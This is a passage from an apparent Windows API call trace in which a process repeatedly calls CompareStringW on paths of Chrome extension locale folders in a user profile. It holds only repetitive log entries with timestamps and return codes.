lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\", cchCount2=130) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\", cchCount2=130) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\", cchCount2=130) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\", cchCount2=130) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\", cchCount2=131) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\", cchCount2=131) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\", cchCount2=131) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\", cchCount2=131) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\", cchCount2=131) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\", cchCount2=132) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\", cchCount2=132) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\", cchCount2=132) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\", cchCount2=132) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\", cchCount2=132) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\", cchCount2=131) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\", cchCount2=131) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\", cchCount2=131) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\", cchCount2=131) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\", cchCount2=131) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\", cchCount2=133) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\", cchCount2=133) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\", cchCount2=133) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\", cchCount2=133) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\", cchCount2=133) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount2=132) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount2=132) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount2=132) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount2=132) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount2=132) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\", cchCount2=132) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\", cchCount2=132) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\", cchCount2=132) returned 3 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\", cchCount2=132) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\", cchCount2=132) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\", cchCount2=126) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\", cchCount2=126) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\", cchCount2=126) returned 1 [0280.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\", cchCount2=126) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\", cchCount2=126) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\", cchCount2=126) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\", cchCount2=132) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\", cchCount2=132) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\", cchCount2=132) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\", cchCount2=132) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\", cchCount2=132) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\", cchCount2=130) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\", cchCount2=130) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\", cchCount2=130) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\", cchCount2=130) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\", cchCount2=130) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 